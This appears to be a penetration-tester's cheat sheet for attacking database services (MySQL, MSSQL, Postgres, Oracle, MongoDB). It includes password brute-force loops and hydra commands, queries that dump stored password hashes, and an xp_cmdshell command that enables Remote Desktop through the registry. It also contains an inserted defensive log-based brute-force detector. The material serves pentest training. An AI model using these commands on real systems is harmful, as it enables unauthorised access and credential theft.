Databases
[3306,MySQL]
Links
- https://recipeforroot.com/mysql-to-system-root/
- https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
- https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/
- https://www.electrictoolbox.com/shell-commands-mysql-command-line-client/
- https://sushant747.gitbooks.io/total-oscp-guide/list_of_common_ports.html
- https://highon.coffee/blog/lord-of-the-root-walkthrough/
Very often has a root user, which can be brute-forced.
If you have a local shell, try this bash loop against the root account (worth a try):
```bash
while [ 1 ]; do mysql -u root --password=123; done
```
Connect to MySQL:
```bash
mysql -u root -p
```
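As a defender-side counterpart to the brute-force loop above, an added example (not from the original notes): a small Python detector that flags repeated "Access denied" entries for the same user and source host in a MySQL error log. The sample log lines and their exact format are constructed assumptions; adjust the regex to the log format on the server you monitor.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines shaped like MySQL error-log "Access denied" entries
# (assumption: the server logs failed logins at this verbosity, in this layout).
SAMPLE_LOG = """\
2024-03-01T10:00:00.100000Z 12 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-03-01T10:00:00.300000Z 13 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-03-01T10:00:00.500000Z 14 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-03-01T10:00:00.700000Z 15 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-03-01T10:00:00.900000Z 16 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-03-01T10:05:00.000000Z 17 [Note] Access denied for user 'app'@'10.0.0.9' (using password: YES)
2024-03-01T11:00:00.000000Z 18 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
"""

DENIED_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+\[\w+\]\s+Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'"
)

def parse_denied(log_text):
    """Yield (timestamp, user, host) for every 'Access denied' line."""
    for line in log_text.splitlines():
        m = DENIED_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%fZ")
            yield ts, m.group("user"), m.group("host")

def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {(user, host): peak_count} for sources that reach `threshold`
    failed logins inside any sliding window of length `window`."""
    events = defaultdict(list)
    for ts, user, host in parse_denied(log_text):
        events[(user, host)].append(ts)
    hits = {}
    for key, times in events.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window forward
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[key] = max(hits.get(key, 0), count)
    return hits

if __name__ == "__main__":
    for (user, host), n in find_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force: {user}@{host}, {n} failures within 60s")
```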
## MySQL Database
```bash
mysql -h 192.168.100.138 -p
```
```sql
show databases;
use databasename;
show tables;
describe table;
select * from payments [where id=9];
select @@version;
```
### Non interactive shell
```bash
mysql -uroot -proot -e 'show databases;'
mysql -uroot -proot -e 'use SkyTech; show tables;'
mysql -uroot -proot -e 'use SkyTech; select * from login;'
```
### ENUM
```sql
SELECT @@version;
SELECT @@hostname;
SELECT @@datadir;
SELECT user();
SELECT system_user();
SELECT user FROM mysql.user;
SELECT host, user, password FROM mysql.user;
SELECT database();
```
### DATABASES
```sql
SHOW DATABASES;
SELECT * FROM information_schema.tables;
SELECT schema_name FROM information_schema.schemata;
SELECT distinct(db) FROM mysql.db; -- priv
```
### TABLES
```sql
SHOW TABLES;
SELECT table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
```
### COLUMNS
```sql
DESCRIBE table;
SELECT column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
```
[1433,1434,mssql] UDP 1433,1334
MS SQL Server Enumeration
- https://www.hackingarticles.in/mssql-peneration-testing-using-nmap/
- https://www.adampalmer.me/iodigitalsec/2013/08/10/accessing-and-hacking-mssql-from-backtrack-linux/
- http://travisaltman.com/pen-test-and-hack-microsoft-sql-server-mssql/
- https://www.google.com/search?client=safari&rls=en&q=mssql+default+passwords&ie=UTF-8&oe=UTF-8
- http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
```bash
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip
```
Leverage xp_cmdshell to get a shell. If xp_cmdshell is not turned on, you have to enable it first; this requires "advanced options" to be on:
Enable Remote Desktop:
```sql
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go
```
Use Nmap to remotely execute commands through MS-SQL
Metasploit:
Postgres 5432,5433
No root user, but psql or postgres:
```bash
psql -h 192.168.100.138 -p 5433 -U root -w
hydra -l postgres -P weak.txt postgres://192.168.100.138
psql -h 192.168.100.138 -p 5433 -U postgres
```
Oracle port 1521,1541
- https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573
- https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#oracle
- https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener
- https://www.doyler.net/security-not-included/oracle-command-execution-sys-shell
- https://security.stackexchange.com/questions/95729/oracle-sql-injection-reverse-shell

1. Enumerate version info (search for known vulns)
2. Bruteforce TNS listener communication (not always needed)
3. Enumerate/Bruteforce SID names (like database names)
4. Bruteforce credentials for a valid SID name discovered
5. Try to execute code
Default passwords: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm (a lot of default passwords available)
```bash
tnscmd10g status -h INSERTIPADDRESS
```
Port 2100 - Oracle XML DB: sys:sys, scott:tiger
No SQL
Often means no authentication; brute force is fast because of the design of databases like Redis.
[27017,mongod]
```bash
nmap {nmap_extra} -sV -p {port} --script="mongodb*"
```
You may encounter NoSQL instances like MongoDB in your OSCP journeys (/cgi-bin/mongo/2.2.3/dbparse.py). NoSQLMap can help you automate NoSQL database enumeration.
NoSQLMap Examples
NoSQLMap Installation
Default-credential wordlist: /usr/share/wordlists/SecLists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt
```bash
hydra -C default_accounts.txt ftp://localhost
```
hexorbase: MySQL, Oracle, PostgreSQL, SQLite, MS-SQL bruteforcer and database browser
```bash
nmap {nmap_extra} -sV -p {port} --script="(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args="mssql.instance-port={port},mssql.username=sa,mssql.password=sa"
```
[50000,DB2]